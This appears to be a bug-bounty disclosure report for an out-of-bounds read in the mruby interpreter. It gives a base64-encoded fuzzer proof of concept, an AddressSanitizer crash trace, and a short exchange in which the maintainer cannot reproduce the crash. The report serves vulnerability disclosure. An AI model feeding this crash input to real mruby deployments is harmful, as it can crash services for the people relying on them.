Out-of-bounds Read in mruby/mruby
Valid
Reported on
Feb 16th 2022
Description
commit ecb28f4bf463483cf914c799d086b0cfff997aee
Proof of Concept
⚡ root@pocas ~/fuzz/mruby2 master ± echo "P2MKWyoqMCwqKjgsbTowXQSAPRpbAAB7" | base64 -d > poc1
⚡ root@pocas ~/fuzz/mruby2 master ± ./bin/mruby poc1
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2524121==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x00000059fd79 bp 0x7ffc5b998bd0 sp 0x7ffc5b997c50 T0)
==2524121==The signal is caused by a READ memory access.
==2524121==Hint: address points to the zero page.
#0 0x59fd79 in mrb_check_frozen /root/fuzz/mruby2/include/mruby.h:1418:7
#1 0x59fd79 in hash_modify /root/fuzz/mruby2/src/hash.c:1154:3
#2 0x59fd79 in mrb_hash_merge /root/fuzz/mruby2/src/hash.c:1734:3
#3 0x4df12f in mrb_vm_exec /root/fuzz/mruby2/src/vm.c:2780:7
#4 0x4d77de in mrb_vm_run /root/fuzz/mruby2/src/vm.c:1128:12
#5 0x5e9602 in mrb_load_exec /root/fuzz/mruby2/mrbgems/mruby-compiler/core/parse.y:6883:7
#6 0x5ea4f3 in mrb_load_detect_file_cxt /root/fuzz/mruby2/mrbgems/mruby-compiler/core/parse.y:6926:12
#7 0x4cb88b in main /root/fuzz/mruby2/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
#8 0x7ff4daabd564 in __libc_start_main csu/../csu/libc-start.c:332:16
#9 0x41d7ad in _start (/root/fuzz/mruby2/bin/mruby+0x41d7ad)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/mruby2/include/mruby.h:1418:7 in mrb_check_frozen
==2524121==ABORTING
Impact
This vulnerability is capable of...
We are processing your report and will contact the
mruby
team within 24 hours.
a year ago
Pocas modified the report
a year ago
Again, the patch above has nothing to do with this issue. Found after the patched commit.
Yukihiro "Matz" Matsumoto Yukihiro
commented
a year ago
Hmm. I cannot reproduce the problem after ff3a5ebed6ffbe3e70481531cfb969b497aa73ad Can you show us additional information to reproduce the issue, please?
to join this conversation